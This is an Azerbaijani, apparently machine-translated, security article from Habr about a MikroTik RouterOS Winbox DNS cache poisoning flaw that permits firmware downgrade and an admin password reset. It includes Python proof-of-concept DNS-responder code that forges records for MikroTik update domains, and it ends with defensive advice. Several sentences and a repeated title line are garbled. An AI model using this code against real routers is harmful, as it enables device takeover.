RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

RouterOS (Mikrotik) əsasında cihazları uzaqdan endirmək imkanı yüz minlərlə şəbəkə cihazını təhlükə altına qoyur. Zəiflik Winbox protokolunun DNS keşinin zəhərlənməsi ilə bağlıdır və köhnəlmiş (defolt parol sıfırlama ilə) və ya dəyişdirilmiş proqram təminatını cihaza yükləməyə imkan verir.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Zəifliyin təfərrüatları

RouterOS terminalı DNS axtarışları üçün həll əmrini dəstəkləyir.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Bu sorğu ikili adlı həlledici tərəfindən idarə olunur. Resolver, RouterOS-un Winbox protokoluna qoşulan bir çox binarlardan biridir. Yüksək səviyyədə Winbox portuna göndərilən "mesajlar" massiv əsaslı nömrələmə sxemi əsasında RouterOS-da müxtəlif binar sistemlərə yönləndirilə bilər.

DNS server funksiyası RouterOS-da defolt olaraq qeyri-aktivdir.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Bununla belə, server funksiyası qeyri-aktiv olsa belə, marşrutlaşdırıcı öz DNS keşini saxlayır.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Biz example.com kimi winbox_dns_request istifadə edərək sorğu etdikdə, marşrutlaşdırıcı nəticəni önbelleğe alacaq.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Sorğunun keçəcəyi DNS serverini təyin edə bildiyimiz üçün səhv ünvanlar daxil etmək mənasızdır. Məsələn, DNS server tətbiqini konfiqurasiya edə bilərsiniz Filip Klaushəmişə 192.168.88.250 IP ünvanını ehtiva edən A qeydi ilə cavab vermək.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

İndi example.com-da axtarış etmək üçün Winbox-dan istifadə etsəniz, marşrutlaşdırıcının DNS keşinin zəhərləndiyini görə bilərsiniz.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Əlbəttə ki, example.com-u zəhərləmək çox faydalı deyil, çünki marşrutlaşdırıcı ondan istifadə etməyəcək. Bununla belə, marşrutlaşdırıcının upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com və download.mikrotik.com saytına daxil olması lazımdır. Və başqa bir səhv sayəsində hamısını bir anda zəhərləmək mümkündür.

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(
        id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
    qname = request.q.qname
    qn = str(qname)
    reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
    reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    reply.add_answer(RR("download.mikrotik.com",ttl=604800,
        rdata=A("192.168.88.250")))
    print("---- Reply:n", reply)
    return reply.pack()

Router bir qrant tələb edir və biz beşini geri veririk. Router bütün bu cavabları səhv olaraq yaddaşda saxlayır.

RouterOS-da Backport zəifliyi yüz minlərlə cihazı təhdid edir

Aydındır ki, bu hücum marşrutlaşdırıcının DNS serveri kimi fəaliyyət göstərdiyi təqdirdə də faydalıdır, çünki o, marşrutlaşdırıcının müştərilərinə hücum etməyə imkan verir.

Həmçinin, bu hücum daha ciddi zəiflikdən istifadə etməyə imkan verir: RouterOS versiyasının aşağı salınması və ya geri göndərilməsi. Təcavüzkar yeniləmə serverinin məntiqini, o cümlədən dəyişiklik jurnalını yenidən yaradır və RouterOS-u köhnəlmiş (həssas) versiyanı yeni kimi qəbul etməyə məcbur edir. Buradakı təhlükə ondan ibarətdir ki, siz versiyanı “yeniləşdirən” zaman administrator parolu “standart” dəyərə sıfırlanır – təcavüzkar boş parolla daxil ola bilər!


Hücum buna baxmayaraq olduqca işləyir müəllif ilə əlaqəli daha bir neçə vektoru həyata keçirir proqram təminatına arxa qapının yerləşdirilməsi, lakin bu artıq lazımsız texnologiyadır və onun qeyri-qanuni məqsədlər üçün istifadəsi qanunsuzdur.

müdafiə

Sadəcə Winbox-u söndürmək bu hücumlardan qorunmağa kömək edir. Winbox vasitəsilə idarəetmənin rahatlığına baxmayaraq, SSH protokolundan istifadə etmək daha yaxşıdır.

Mənbə: www.habr.com

Добавить комментарий